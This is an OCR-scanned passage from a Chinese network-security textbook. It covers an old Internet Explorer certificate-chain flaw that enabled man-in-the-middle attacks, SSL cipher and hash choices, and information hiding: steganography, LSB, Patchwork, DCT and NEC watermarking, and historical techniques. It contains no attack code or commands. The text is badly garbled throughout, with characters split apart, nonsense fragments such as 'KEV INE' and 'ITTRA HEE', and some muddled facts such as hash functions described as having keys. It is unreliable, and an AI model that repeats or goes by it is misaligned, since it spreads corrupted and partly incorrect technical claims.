Constraints (CA 基本 约束 ， 决 定 该 证 书 是 否 可 以 做 CA 的 证 书 )， 这 种 情况 下 攻击 者 不 
可 能 进行 中 间 人 攻击 ， 但 实际 上 IE5.0、5.5、6.0 浏览 器 对 是 否 拥 有 合法 的 CA Basic 
Constraints 并 不 做 验证 ， 所 以 攻击 者 只 要 有 任何 域 的 、 合 法 的 CA 签发 证 书 ， 就 能 生成 
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其 他 任何 域 的 合法 CA 签发 证 书 ， 从 而 导致 中 间 人 攻击 。 对 此 可 以 给 TE 打 补 丁 ， 也 可 以 
使 用 Netscape 4.x 或 Mozilla 浏览 器 。 对 于 一 些 非常 敏感 的 应 用 , 建议 在 进行 SSL 连接 时 
手工 检查 证 书 链 ， 如 果 发 现 有 中 间 证 书 ， 可 以 认为 正在 遭受 中 间 人 攻击 ， 立 即 采取 相应 
保护 措施 。 

由 于 美国 密码 出 口 的 限制 ， 正 、Netscape 等 浏览 器 所 支持 的 加 密 强 度 是 很 弱 的 。 
果 只 采用 浏览 器 自 带 的 加 密 功 能 的 话 ， 理 论 上 存在 被 破解 的 可 能 。 > 
个 观点 : 关键 的 系统 、 核 心 的 技术 应 该 拥有 自主 的 知识 产权 。 

3. SSL 协议 的 功能 设计 

SSL 加 密 算 法 和 会 话 密 钥 是 在 握手 协议 中 协商 并 由 CipherChoice 指定 的 。 现 有 的 
SSL 版 本 中 所 用 到 的 加 密 算 法 包括 : RC4、RC2、IDEA、DES 和 3DES， 而 加 密 算法 所 
用 的 密 钥 由 消息 散 列 函数 MD5 产生 。RC4、RC2、 是 由 RSA 定义 的 ， 其 中 RC2 适用 于 
块 加 密 ，RC4 适用 于 流 加 密 。 

SSL 协议 中 对 称 加 密 用 于 加 密 应 用 数据 ， 非 对 称 加 密 用 于 验证 实体 和 交换 密 钥 。 非 
对 称 加 密 算法 按 用 途 分 为 密 钥 交换 算法 和 数字 签名 算法 。SSL 协议 给 出 的 序列 加 密 算法 
有 RC4 (40 位 和 128 位 密 钥 ); 给 出 的 分 组 加 密 算法 有 40 位 密 钥 的 RC2[RC2 98]. 40 
和 56 位 密 钥 的 DES[DES 83], 3DES[3DES 79], IDEA[IDEA 92] 和 Fortezza; 另外 协议 指 
定 专 为 出 口 使 用 的 40 位 的 DES， 命 名 为 DES40。 目 前 SSL 协议 给 出 的 密 钥 交 换算 法 有 
RSA[RSA 78], Diffie—Hellman[DH 77] 和 Fortezza dms[FOR 95]; 数字 签名 算法 有 RSA 
和 了 DSA。 数 字 签名 时 ， 单 向 Hash 函数 Cone- hash function ) e ei 
RSA 签名 中 ,一 个 36 字 节 的 两 个 Hash 函数 (一 个 是 SHA Hash, 是 MDS Hash) 的 
连接 被 签名 ，DSS 签名 [DSS 94] 中 ， 一 个 20 字 SHA Hash es SSL 协议 指定 的 
Hash 算法 有 128 位 密 钥 的 MD5 和 160 位 密 钥 的 SHA。 


53 ”信息 隐藏 
5.3.1 信息 隐藏 概论 


53.11 EM. DE. BA 

1. 什么 是 信息 隐藏 

多 媒体 数据 的 数字 化 为 多 媒体 信息 的 存 取 提 供 了 极 大 的 便利 ， 同 时 也 极 大 地 提高 了 
信息 表达 的 效率 和 准确 性 。 随 着 Intemet 的 日 益 普及 ， 多 媒体 信息 的 交流 已 达到 了 前 所 
未 有 的 深度 和 广度 ， 其 发 布 形式 也 愈加 丰富 。 人 们 如 今 也 可 以 通过 Intemet 发 布 自己 的 
作品 、 重 要 信息 和 进行 网 上 贸易 等 ， 但 是 随 之 而 出 现 的 问题 也 十 分 严重 : 如 作品 侵权 更 
加 容易 ， 算 改 也 更 加 方便 。 因 此 如 何 既 充分 利用 Intemet 的 便利 ， 又 能 有 效 地 保护 知识 
产权 , 已 受到 人 们 的 高 度 重视 。 一 门 新 兴 的 交叉 学 科 一 一 信息 隐藏 (Information Hiding) 
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学 诞生 了 。 如 今 信 息 隐 藏 学 作为 隐蔽 通信 和 知识 产权 保护 等 的 主要 手段 ， 正 得 到 广泛 的 
研究 与 应 用 。 所 谓 信息 隐藏 就 是 将 秘密 信息 隐藏 到 一 般 的 非 秘密 的 数字 媒体 文件 (如 图 
像 、 声 音 、 文 档 文 件 ) 中 ， 从 而 不 让 对 手 发 觉 的 一 种 信息 保护 方法 。 

信息 隐藏 是 把 一 个 有 意义 的 信息 隐藏 在 另 一 个 称 为 载体 (Cover) 的 信息 中 得 到 隐蔽 
载体 (Stego Cover) S。 如 图 5-11 所 示 ， 非 法 者 不 知道 这 个 普通 信息 中 是 否 隐藏 了 其 他 
的 信息 ， 而 且 即 使 知道 也 难以 提取 或 去 除 隐 藏 的 信息 。 所 用 的 载体 可 以 是 文字 、 图 像 、 
声音 及 视频 等 。 为 增加 攻击 的 难度 ， 也 可 以 把 加 密 与 信息 隐藏 技术 结合 起 来 ， 即 先 对 消 
息 M 加 密 得 到 密 文 消息 M"， 再 把 M* 隐 藏 到 载体 C 中 。 这 样 攻击 者 要 想 获 得 消息 ， 就 
首先 要 检测 到 消息 的 存在 ， 并 知道 如 何 从 隐蔽 的 载体 S 中 提取 M? 及 如 何 对 MM 解密 以 恢 
复 消息 M。 


载体 


J 


隐秘 载体 


11001100110 
01100111000 
111000 


消息 
隐秘 载体 
消息 隐藏 + 
11001100110 
01100111000 
111000 


图 5-11 信息 加 密 与 隐藏 的 比较 
信息 隐藏 不 同 于 传统 的 密码 学 技术 。 密 码 技术 主要 是 研究 如 何 将 机 密 信息 进行 特殊 
的 编码 ， 以 形成 不 可 识别 的 密 文 进行 传递 ， 而 信息 隐藏 则 主要 研究 如 何 将 某 一 机 密 信 息 
秘密 隐藏 于 另 一 公开 的 信息 中 ， 然 后 通过 公开 信息 的 传输 来 传递 机 密 信息 。 对 加 密 通 信 
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而 言 ， 可 能 的 监测 者 或 非法 拦截 者 可 通过 截取 密 文 ， 并 对 其 进行 破译 ， 或 将 密 文 进行 破 

坏 后 再 发 送 ， 从 而 影响 机 密 信 息 的 安全 ;但 对 信息 隐藏 而 言 ， 可 能 的 监测 者 或 非法 拦截 

者 则 难以 从 公开 信息 中 判断 机 密 信息 是 否 存 在 ， 难 以 截获 机 密 信息 ， 从 而 能 保证 机 密 信 

息 的 安全 。 多 媒体 技术 的 广泛 应 用 ， 为 信息 隐藏 技术 的 发 展 提供 了 更 加 广阔 的 领域 。 
信息 之 所 以 能 够 隐藏 在 多 媒体 数据 中 是 因为 : 

@ 多 媒体 信息 本 身 存 在 很 大 的 宛 余 性 ， 从 信息 论 的 角度 看 ， 未 压缩 的 多 媒体 信息 
的 编码 效率 是 很 低 的 ,所 以 将 某 些 信息 嵌入 到 多 媒体 信息 中 进行 秘密 传送 是 完全 可 行 的 ， 
并 不 会 影响 多 媒体 本 身 的 传送 和 使 用 。 

© 人 眼 或 人 耳 本 身 对 某 些 信息 都 有 一 定 的 掩蔽 效应 ， 比 如 人 眼 对 灰 度 的 分 状 率 只 
有 几 十 个 灰 度 级 ;对 边沿 附近 的 信息 不 敏感 等 。 利 用 人 的 这 些 特点 ， 可 以 很 好 的 将 信息 
隐藏 而 不 被 察觉 。 

2. 信息 隐藏 的 分 类 

对 信息 隐藏 技术 可 作 如 下 分 类 : 

按 载 体 类 型 分 类 : 包括 基于 文本 ， 图 像 ， 声 音 和 视频 的 信息 隐藏 技术 。 

按 密 钥 分 类 : 若 柑 入 和 提取 采用 相同 密 钥 ， 则 称 其 为 对 称 隐藏 算法 ， 否 则 称 为 公 钥 
隐藏 算法 。 

RARIK: 主要 可 分 为 空域 (或 时 域 ) 方法 及 变换 域 方法 。 空 域 替 换 方法 是 用 
待 隐藏 的 信息 替换 载体 信息 中 的 元 余部 分 。 一 种 简单 的 替换 方法 就 是 用 隐藏 信息 位 替换 
载体 中 的 一 些 最 不 重要 位 〈Least Significant Bit，LSB)， 只 有 知道 隐藏 信息 霸 入 的 位 置 
才能 提取 信息 。 比 如 说 ， 若 把 一 个 灰 度 图 像 的 某 个 像素 点 的 灰 度 值 由 180 变 成 182， 人 
的 肉眼 是 看 不 出 来 的 。 这 种 方法 较为 简单 ， 但 其 鲁 棒 性 较 差 。 对 载体 的 较 小 的 扰动 ， 如 
有 损 压 缩 ， 都 有 可 能 导致 整个 信息 的 丢失 。 因 此 ， 目 前 的 多 数 信息 隐藏 方法 都 采用 了 变 
换 域 技术 ， 即 把 待 隐藏 的 信息 嵌入 到 载体 的 一 个 变换 空间 〈 如 频 域 ) 中 。 与 空域 方法 相 
比 ， 变 换 域 方法 的 优点 如 下 : 

。 在 变换 域 中 嵌入 的 信号 能 量 可 以 分 布 到 空域 的 所 有 像素 上 。 

。 在 变换 域 中 ， 人 的 感知 系统 的 某 些 掩蔽 特性 可 以 更 方便 地 结合 到 编码 过 程 中 。 

。 变换 域 方法 可 与 数据 压缩 标准 ， 如 JPEG 等 兼容 ， 常 用 的 变换 包括 离散 余弦 变换 

和 小 波 变换 ， 一 般 来 说 ， 变 换 域 方法 对 诸如 压缩 ， 修 剪 和 某 些 图 像 处 理 等 的 攻击 
的 鲁 棒 性 更 强 。 

按 提 取 的 要 求 分 类 : 若 在 提取 隐藏 信息 时 不 需要 利用 原始 载体 C， 则 称 为 盲 隐藏; 
否则 称 为 非 盲 隐藏 。 显 然 ， 使 用 原始 的 载体 数据 更 便于 检测 和 提取 信息 。 但 是 ， 在 数据 
监控 和 跟踪 等 场合 ， 我 们 并 不 能 获得 原始 的 载体 。 对 于 其 他 的 一 些 应 用 ， 如 视频 水 印 ， 
即使 可 获得 原始 载体 ， 但 由 于 数据 量 巨 大 ， 要 使 用 原始 载体 也 是 不 现实 的 。 因 此 目前 主 
要 采用 的 是 盲 隐藏 技术 。 

按 保护 对 象 分 类 : 主要 可 分 为 隐 写 术 和 水 印 技术 等 两 大 类 。 隐 写 术 保 护 的 是 隐秘 消 
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息 ， 水 印 技术 的 保护 对 象 一 般 为 载体 。 


。 隐 写 术 : 其 目的 是 在 不 引起 任何 怀疑 的 情况 下 秘密 传送 消息 ， 因 此 它 的 主要 要 求 
是 不 被 检测 到 和 大 容量 等 。 例 如 在 利用 数字 图 像 实现 秘密 消息 隐藏 时 ， 就 是 在 合 
成 器 中 利用 人 的 视觉 元 余 把 待 隐 的 消息 加 密 后 嵌入 到 数字 图 像 中 ， 使 人 无 法 从 图 
像 的 外 观 上 发 现 有 什么 变化 。 加 密 操作 一 方面 是 嵌入 到 图 像 中 的 内 容 变 为 伪 随 机 
序列 ， 使 数字 图 像 的 各 种 统计 值 不 发 生 明 显 的 变化 ， 从 而 增加 监测 的 难度 ， 当 然 
还 可 以 采用 校 验 码 和 纠 错 码 等 方法 提高 抗 干扰 的 能 力 ， 而 通过 公开 信道 接收 到 隐 
写 文档 的 一 方 则 用 分 离 器 把 隐蔽 的 消息 分 离 出 来 。 在 这 个 过 程 中 必须 充分 考虑 到 
在 公开 信道 中 被 检测 和 干扰 的 可 能 性 。 相 对 来 说 隐 写 术 已 经 是 比较 成 熟 的 信息 隐 
藏 技术 了 。 

数字 水 印 ， 翌 在 数字 产品 中 的 数字 信号 ， 可 以 是 图 像 文字， 符号 ， 数 字 等 一 切 
可 以 作为 标识 和 标记 的 信息 ， 其 目的 是 进行 版 权 保护 、 所 有 权证 明 、 指 纹 ( 追 踪 
发 布 多 份 拷贝 ) 和 完整 性 保护 等 。 因 此 它 的 要 求 是 鲁 棒 性 和 不 可 感知 性 等 ， 数 字 
水 印 还 可 以 根据 应 用 领域 不 同 而 划分 为 许多 有 具体 的 分 类 ,例如 用 于 版 权 保护 的 鲁 
棒 水 印 ， 用 于 保护 数据 完整 性 的 易 损 水 印 等 ， 其 中 用 于 版 权 保护 的 鲁 棒 水 印 是 目 
前 研究 的 热点 。 
按照 应 用 分 类 : 信 


息 隐 藏 有 广泛 的 应 用 ， 主 要 有 隐秘 通信 、 版 权 保 护 、 完 整 性 认证 、 


使 用 控制 、 数 据 标识 等 等 。 


需要 指出 的 是 ， 对 信息 隐藏 技术 的 不 同 应 用 ， 各 自 有 着 进一步 不 同 的 具体 要 求 ， 并 


非 都 满足 上 述 要 求 。 信 息 隐藏 技术 包含 的 内 容 范围 十 分 广泛 ， 可 以 作 如 图 5-12 所 示 的 分 类 。 


基于 技术 的 隐 


不 可 见 水 印 


图 5-12 信息 隐藏 技术 的 分 类 
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3. 信息 隐藏 技术 特点 

信息 隐藏 技术 必须 考虑 正常 的 信息 操作 所 造成 的 威胁 ， 即 要 使 机 密 资料 对 正常 的 数 
据 操 作 技术 具有 免疫 能 力 。 这 种 免疫 力 的 关键 是 要 使 隐藏 信息 部 分 不 易 被 正常 的 数据 操 
作 《〈 如 通常 的 信号 变换 操作 或 数据 压缩 ) 所 破坏 。 根 据 信息 隐藏 的 目的 和 技术 要 求 ， 该 
技术 存在 以 下 特性 : 

(1) 透明 性 

透明 性 Gnvisibility) 也 叫 隐蔽 性 。 这 是 信息 伪装 的 基本 要 求 。 利 用 人 类 视觉 系统 或 
人 类 听觉 系统 属性 ， 经 过 一 系列 隐藏 处 理 ， 使 目标 数据 没有 明显 的 降 质 现象 ， 而 隐藏 的 
数据 却 无 法 人 为 地 看 见 或 听见 。 

(2) 鲁 棒 性 

鲁 棒 性 (robustness) 指 不 因 图 像 文件 的 某 种 改动 而 导致 隐藏 信息 丢失 的 能 力 。 这 里 
所 谓 “改动 ”包括 传输 过 程 中 的 信道 噪音 、 滤 波 操作 、 重 采样 、 有 损 编码 压缩 、D/A 或 
AID 转换 等 。 

(3) 不 可 检测 性 

不 可 检测 性 〈undetectability) 指 隐蔽 载体 与 原始 载体 具有 一 致 的 特性 。 如 具有 一 致 
的 统计 噪声 分 布 等 ， 以 便 使 非法 拦截 者 无 法 判断 是 否 有 隐蔽 信息 。 

(4) 安全 性 

安全 性 〈security) 指 隐藏 算法 有 较 强 的 抗 攻击 能 力 ， 即 它 必须 能 够 承受 一 定 程 度 的 
人 为 攻击 ， 而 使 隐藏 信息 不 会 被 破坏 。 隐 藏 的 信息 内 容 应 是 安全 的 ， 应 经 过 某 种 加 密 后 
再 隐藏 ， 同 时 隐藏 的 具体 位 置 也 应 是 安全 的 ， 至 少 不 会 因 格 式 变换 而 遭 到 破坏 。 

(5) 自 恢复 性 

由 于 经 过 一 些 操作 或 变换 后 ， 可 能 会 使 原 图 产生 较 大 的 破坏 ， 如 果 只 从 留 下 的 片段 
数据 ， 仍 能 恢复 隐藏 信号 ， 而 且 恢复 过 程 不 需要 宿主 信号 ， 这 就 是 所 谓 的 自 恢复 性 。 

(6) 对 称 性 

通常 信息 的 隐藏 和 提取 过 程 具有 对 称 性 ， 包 括 编码 、 加 密 方式 ， 以 减少 存 取 难度 。 

(7) 可 纠 错 性 

为 了 保证 隐藏 信息 的 完整 性 ， 使 其 在 经 过 各 种 操作 和 变换 后 仍 能 很 好 的 恢复 ， 通 常 
采取 纠 错 编码 方法 。 
5.3.1.2 ”信息 隐藏 模型 

我 们 称 待 隐藏 的 信息 为 秘密 信息 (secret message)， 它 可 以 是 版 权 信息 或 秘密 数据 ， 
也 可 以 是 一 个 序列 号 ; 而 公开 信息 则 称 为 载体 信息 (cover message)， 如 视频 、 音 频 片 段 。 
这 种 信息 隐藏 过 程 一 般 由 密 钥 (Key) 来 控制 ， 即 通过 嵌入 算法 (Embedding algorithm) 
将 秘密 信息 隐藏 于 公开 信息 中 ， 而 隐蔽 载体 (隐藏 有 秘密 信息 的 公开 信息 〉 则 通过 信道 
(Communication channel) 传递 ， 然 后 检测 器 (Detector) 利用 密 钥 从 隐蔽 载体 中 恢复 / 检 
测 出 秘密 信息 。 
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预 处 理 


图 5-13 ”信息 的 隐藏 和 提取 系统 模型 


5.3.1.3 ”常用 算法 

信息 隐藏 及 数字 水 印 技术 是 近 几 年 来 国际 学 术 界 兴起 的 一 个 前 沿 研 究 领域 。 虽 然 其 
载体 可 以 是 文字 、 图 像 、 语 音 等 不 同 格式 的 文件 ， 但 是 使 用 的 方法 没有 本 质 的 区 别 。 因 
此 ， 下 面 将 以 信息 隐藏 技术 在 图 像 中 的 应 用 即 遮 掩 消息 选用 数字 图 像 的 情况 为 例 进 行 
说 明 。 

在 图 像 中 应 用 的 信息 隐藏 技术 基本 上 可 以 分 为 两 大 类 : 空域 法 和 频 域 法 。 空 域 法 就 
是 直接 改变 图 像 元 素 的 值 ， 一 般 是 在 图 像 元 素 的 亮度 和 色 带 中 加 入 隐藏 的 内 容 。 频 域 法 
是 利用 某 种 数学 变换 , 将 图 像 用 频 域 表 示 , 通过 更 改 图 像 的 某 些 频 域 系数 加 入 待 隐 消息 ， 
然后 再 利用 反 变 换 来 生成 隐藏 有 其 他 信息 的 图 像 。 各 种 不 同 的 数学 变换 都 可 以 被 使 用 ， 
目前 已 有 的 方法 ， 主 要 集中 在 小 波 变换 ， 频 率 变换 ，DCT 变换 等 等 。 

O 空域 算法 : 该 类 算法 中 典型 的 算法 是 将 信息 嵌入 到 随机 选择 的 图 像 点 中 最 不 重 
要 的 像素 位 (LSB) 上 ， 这 可 保证 嵌入 的 水 印 是 不 可 见 的 。LSB 算法 的 主要 优点 是 可 以 
实现 高 容量 和 较 好 的 不 可 见 性 ， 但 是 该 算法 的 鲁 棒 性 差 ， 容 易 被 第 三 方 发 现 和 得 到 ， 遭 
到 破坏 ， 对 图 像 的 各 种 操作 如 压缩 ， 剪 切 等 都 会 使 算法 的 可 靠 性 受到 影响 。 为 了 增强 算 
法 的 性 能 ， 提 出 了 各 种 改进 的 方法 ， 如 利用 伪 随 机 序列 ， 以 随机 的 顺序 修改 图 像 的 LSB; 
在 使 用 密 钥 的 情况 下 ， 才 能 得 到 正确 的 嵌入 序列 。 另 外 一 个 常用 方法 是 利用 像素 的 统计 
特征 将 信息 嵌入 像素 的 亮度 值 中 。 

@ Patchwork 算法 : 该 算法 是 随机 选择 N 对 像素 点 〈ai，bi)， 然 后 将 每 个 ai 点 的 亮 
度 值 加 1， 每 个 bi 点 的 亮度 值 减 1， 这 样 整个 图 像 的 平均 亮度 保持 不 变 。 适 当地 调整 参 
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数 ，Patchwork 方法 对 JPEG 压缩 、FIR 滤波 以 及 图 像 裁 前 有 一 定 的 抵抗 力 ， 但 该 方法 嵌 
入 的 信息 量 有 限 。 为 了 媒 入 更 多 的 水 印信 息 ， 可 以 将 图 像 分 块 ， 然 后 对 每 一 个 图 像 块 进 
ITTRA HEE. 

@ 频 域 算法 : 该 类 算法 中 ， 大 部 分 算法 采用 了 扩展 频谱 通信 (spread spectrum 
communication) 技术 。 算 法 实现 过 程 为 ， 先 计算 图 像 的 离散 余弦 变换 (DCT)， 然 后 将 
KEV INE DCT 域 中 幅 值 最 大 的 前 k 系数 上 (不 包括 直流 分 量 )， 通 常 为 图 像 的 低频 分 
量 。 若 DCT 系数 的 前 k 个 最 大 分 量 表示 为 D={ dj}j， 运 1，…，Kk， 水 印 是 服从 高 斯 分 布 
的 随机 实数 序列 Ww={fwi}， 运 1，…，k， 那 么 水 印 的 嵌入 算法 为 di=di (1+awi)， 其 中 常 
数 a 为 尺度 因子 ， 控 制 水 印 添加 的 强度 。 然 后 用 新 的 系数 做 反 变换 得 到 水 印 图 像 [。 解 
码 函 数 则 分 别 计算 原始 图 像 I 和 水 印 图 像 位 的 离散 余弦 变换 ， 并 提取 舱 入 的 水 印 We, 
再 做 相关 检验 以 确定 水 印 的 存在 与 否 。 该 方法 即使 当 水 印 图 像 经 过 一 些 通用 的 几何 变形 
和 信号 处 理 操作 而 产生 比较 明显 的 变形 后 仍然 能 够 提取 出 一 个 可 信赖 的 水 印 拷贝 。 一 个 
简单 改进 是 不 将 水 印 嵌 入 到 DCT 域 的 低频 分 量 上 ， 而 是 嵌入 到 中 频 分 量 上 以 调节 水 印 
的 健壮 性 与 不 可 见 性 之 间 的 矛盾 。 

另外 ， 还 可 以 将 数字 图 像 的 空间 域 数据 通过 离散 傅 里 叶 变换 (DFT) 或 离散 小 波 变 
换 DWT) 转化 为 相应 的 频 域 系数 ， 其 次 ， 根 据 待 隐藏 的 信息 类 型 ， 对 其 进行 适当 编码 
或 变形 ， 再 次 ， 根 据 隐 藏 信息 量 的 大 小 和 其 相应 的 安全 目标 ， 选 择 某 些 类 型 的 频 域 系数 
序列 〈 如 高 频 或 中 频 或 低频 ); 再 次 ， 确 定 某 种 规则 或 算法 ， 用 待 隐藏 的 信息 的 相应 数据 
去 修改 前 面 选 定 的 频 域 系数 序列 ， 最 后 ， 将 数字 图 像 的 频 域 系数 经 相应 的 反 变 换 转 化 为 
空间 域 数据 。 该 类 算法 的 隐藏 和 提取 信息 操作 复杂 ， 隐 藏 信息 量 不 可 能 很 大 ， 但 抗 攻 击 
能 力 强 ， 很 适合 于 数字 作品 版 权 保护 的 数字 水 印 技术 中 。 

© 压缩 域 算法 : 基于 JPEG, MPEG 标准 的 压缩 域 数 字 水 印 系统 不 仅 节省 了 大 量 的 
完全 解码 和 重新 编码 过 程 ， 而 且 在 数字 电视 广播 及 VOD (Video on Demand) 中 有 很 大 
的 实用 价值 。 相 应 地 ， 水 印 检测 与 提取 也 可 直接 在 压缩 域 数 据 中 进行 。 下 面 介绍 一 种 针 
对 MPEG-2 压缩 视频 数据 流 的 数字 水 印 方案 。 虽 然 MPEG-2 数据 流 语 法 允许 把 用 户 数据 
加 到 数据 流 中 ， 但 是 这 种 方案 并 不 适合 数字 水 印 技术 ， 因 为 用 户 数据 可 以 简单 地 从 数据 
流 中 去 掉 ， 同 时 ， 在 MPEG-2 编码 视频 数据 流 中 增加 用 户 数 据 会 加 大 位 率 ， 使 之 不 适 于 
国定 带宽 的 应 用 ， 所 以 关键 是 如 何 把 水 印信 号 加 到 数据 信号 中 ， 即 加 入 到 表示 视频 帧 的 
数据 流 中 。 对 于 输入 的 MPEG-2 数据 流 而 言 ， 它 可 分 为 数据 头 信 息 、 运 动向 量 (用 于 运 
动 补偿 ) 和 DCT 编码 信号 块 3 部 分 ， 在 方案 中 只 有 MPEG-2 数据 流 最 后 一 部 分 数据 被 
改变 ， 其 原理 是 ， 首 先 对 DCT 编码 数据 块 中 每 一 输入 的 Huffman 码 进行 解码 和 逆 量 化 ， 
以 得 到 当前 数据 块 的 一 个 DCT 系数 ; 其次， 把 相应 水 印信 号 块 的 变换 系数 与 之 相 加 ， 
从 而 得 到 水 印 生 加 的 DCT 系数 , 再 重新 进行 量化 和 Huffman 编码 , 最 后 对 新 的 Huffman 
码 字 的 位 数 nl 与 原来 的 无 水 印 系数 的 码 字 n0 进行 比较 ， 只 在 nl 不 大 于 n0 的 时 候 ， 才 
能 传输 水 印 码 字 ， 和 否则 传输 原 码 字 ， 这 就 保证 了 不 增加 视频 数据 流 位 率 。 该 方法 有 一 个 
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问题 值得 考虑 ， 即 水 印信 号 的 引入 是 一 种 引起 降 质 的 误差 信号 ， 而 基于 运动 补偿 的 编码 
方案 会 将 一 个 误差 扩散 和 累积 起 来 ， 为 解决 此 问题 ， 该 算法 采取 了 漂移 补偿 的 方案 来 抵 
消 因 水 印信 号 的 引入 所 引起 的 视觉 变形 。 

© NEC 算法 : 该 算法 由 NEC 实验 室 的 Cox 等 人 提出 , 该 算法 在 数字 水 印 算法 中 占 
有 重要 地 位 ， 其 实现 方法 是 ， 首 先 以 密 钥 为 种 子 来 产生 伪 随 机 序列 ， 该 序列 具有 高 斯 N 
O, 1) 分 布 ， 密 钥 一 般 由 作者 的 标识 码 和 图 像 的 哈 希 值 组 成 ， 其 次 对 图 像 做 DCT 变换 ， 
最 后 用 伪 随 机 高 斯 序列 来 调制 (车 加 ) 该 图 像 除 直 流 CDC) 分 量 外 的 1000 个 最 大 的 DCT 
系数 。 该 算法 具有 较 强 的 鲁 棒 性 、 安 全 性 、 透 明 性 等 。 由 于 采用 特殊 的 密 钥 ， 因 此 可 防 
JE IBM 攻击 , 而 且 该 算法 还 提出 了 增强 水 印 鲁 棒 性 和 抗 攻 击 算法 的 重要 原则 , 即 水 印信 
号 应 该 嵌入 源 数据 中 对 人 感觉 最 重要 的 部 分 ， 这 种 水 印信 号 由 独立 同 分 布 随机 实数 序列 
构成 ， 且 该 实数 序列 应 该 具有 高 斯 分 布 N (0，1) 的 特征 。 

© 生理 模型 算法 : 人 的 生理 模型 包括 人 类 视觉 系统 HVS (Human Visual System) 
和 人 类 听觉 系统 HAS。 该 模型 不 仅 被 多 媒体 数据 压缩 系统 利用 ， 同 样 可 以 供 数 字 水 印 系 
统 利用 。 利 用 视觉 模型 的 基本 思想 均 是 利用 从 视觉 模型 导出 的 JND (Just Noticeable 
Difference) 描述 来 确定 在 图 像 的 各 个 部 分 所 能 容忍 的 数字 水 印信 号 的 最 大 强度 ， 从 而 能 
避免 破坏 视觉 质量 。 也 就 是 说 ， 利 用 视觉 模型 来 确定 与 图 像 相 关 的 调制 掩 模 ， 然 后 再 利 
用 其 来 插入 水 印 。 这 一 方法 同时 具有 好 的 透明 性 和 强健 性 。 
5.3.1.4 ”信息 隐藏 技术 的 发 展 

1 传统 的 信息 隐藏 技术 

数字 化 的 信息 隐藏 技术 的 确 是 一 门 全 新 的 技术 ， 但 是 它 的 思想 其 实 来 自 于 古老 的 隐 
写 术 。 大 约 在 公元 前 440 年 ， 隐 写 术 就 已 经 被 应 用 了 。 当 时 ， 一 位 剃头 匠 将 一 条 机 密 消 
息 写 在 一 位 奴隶 的 光头 上 ， 然 后 等 到 奴隶 的 头发 长 起 来 之 后 ， 将 奴隶 送 到 另 一 个 部 落 ， 
从 而 实现 了 这 两 个 部 落 之 间 的 秘密 通信 。 类 似 的 方法 , 在 20 世纪 初期 仍然 被 德国 间谍 所 
使 用 。 实际 上 , 隐 写 术 自古 以 来 就 一 直 被 人 们 广泛 地 使 用 。 隐 写 术 的 经 典 手法 实在 太 多 ， 
此 处 仅 列举 一 些 例子 : 

G@ 使 用 不 可 见 墨 水 给 报纸 上 的 某 些 字母 作 上 标记 来 向 一 个 间谍 发 送 消息 ; 

© 在 一 个 录音 带 的 某 些 位 置 上 加 一 些 不 易 察觉 的 回声 等 ; 

@ 将 消息 写 在 木板 上 然后 用 石灰 水 把 它 刷 白 ; 

@ 将 信函 隐藏 在 信使 的 鞋底 里 或 妇女 的 耳 饰 中 ; 

© 由 信和 铀 携带 便条 传送 消息 ; 

© 通过 改变 字母 笔画 的 高 度 或 在 掩蔽 文体 的 字母 上 面 或 下 面 挖 出 非常 小 的 小 孔 
(或 用 无 形 的 墨水 印 制作 非常 小 的 斑点 ) 来 隐藏 正文 ; 

© 在 纸 上 打 印 各 种 小 像素 点 组 成 的 块 来 对 诸如 日 期 、 打 印 机 标识 符 、 用 户 标 识 符 
等 信息 进行 编码 ; 

将 秘密 消息 隐藏 “在 大 小 不 超过 一 个 句号 或 小 墨水 点 的 空间 里 ”(1857 年 ); 
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© 将 消息 隐藏 在 微缩 胶片 中 (1870 年 ); 

把 在 显微镜 下 可 见 的 图 像 隐 藏 在 耳 杀 、 鼻 孔 以 及 手指 甲 里 ， 或 者 先 将 间谍 之 间 
要 传送 的 消息 经 过 若干 照相 缩影 步骤 后 缩小 到 微粒 状 ， 然 后 粘 在 无 关 紧要 的 杂志 等 文字 
材料 中 的 句号 或 逗号 上 【第 一 次 世界 大 战 期 间 ); 

D 在 印刷 旅行 支票 时 使 用 特殊 紫外 线 荧 光 墨 水 ; 

O 制作 特殊 的 雕塑 或 绘画 作品 ， 使 得 从 不 同 角度 看 会 显 出 不 同 的 印 像 ; 

@ 用 藏 头 诗 ， 或 者 歧义 性 的 对 联 、 文 章 等 文学 作品 ; 

O 在 乐谱 中 隐藏 信息 (简单 地 将 字母 表 中 的 字母 映射 到 音符 ); 

D 古代 ， 我 国 还 有 一 种 很 有 趣 的 信息 隐藏 方法 ， 即 消息 的 发 送 者 和 接收 者 各 有 一 
张 完全 相同 的 带 有 许多 小 孔 的 掩蔽 纸张 ， 而 这 些小 孔 的 位 置 是 被 随机 选择 并 戳穿 的 ， 发 
送 者 将 掩蔽 纸张 放 在 一 张 纸 上 ， 将 秘密 消息 写 在 小 孔 位 置 上 ， 移 去 掩蔽 纸张 ， 然 后 根据 
纸张 上 留 下 的 字 和 空格 编写 一 段 掩饰 性 的 文章 ， 接 收 者 只 要 把 所 蔽 纸张 覆盖 在 该 纸张 上 
就 可 立即 读 出 秘密 消息 ， 直 到 16 世纪 早期 ， 意 大 利 数学 家 Cardan 又 重新 发 展 了 这 种 方 
法 ， 该 方法 现在 被 称 作 卡 登 格子 隐藏 法 ; 

D 利用 掩蔽 材料 的 预定 位 置 上 某 些 误差 和 风格 特性 来 隐 茂 消息。 比如， 利用 字 的 
标准 体 和 和 斜体 来 进行 编码 ， 从 而 实现 信息 隐藏 ， 将 版 权 信息 和 序列 号 隐藏 在 行 间距 和 文 
档 的 其 他 格式 特性 之 中 ， 通 过 对 文档 的 各 行 提升 或 降低 三 百 分 之 一 英寸 来 表示 0 或 1 等 等 。 

2. 数字 信息 隐藏 技术 的 发 展 

第 一 篇 关于 图 像 数 字 水印 的 文章 发 表 于 1994 年 ，1995 年 以 后 ， 数 字 水 印 技术 获得 
广泛 的 关注 并 且 得 到 了 较 快 的 发 展 , 仅 1998 年 就 发 表 了 100 篇 左右 有 关 数 字 水 印 技术 的 
文章 。 与 此 同时 ， 也 出 现 了 一 些 研究 隐秘 术 的 文章 。 据 Anderson 和 Petitcolas 的 统计 ， 
到 1999 年 8 月 止 ， 国 际 上 关于 信息 隐藏 技术 的 文章 已 达 400 篇 左右 。 在 过 去 几 年 中 ， 从 
事 信息 隐藏 技术 的 研究 人 员 和 组 织 不 断 增加 ， 国 际 上 已 先后 于 1996 年 在 英国 ，1998 年 
在 波兰 ，1999 年 在 德国 ，2001 在 美国 ，2002 年 在 荷兰 召开 了 五 次 信息 隐藏 学 术 会 议 。 
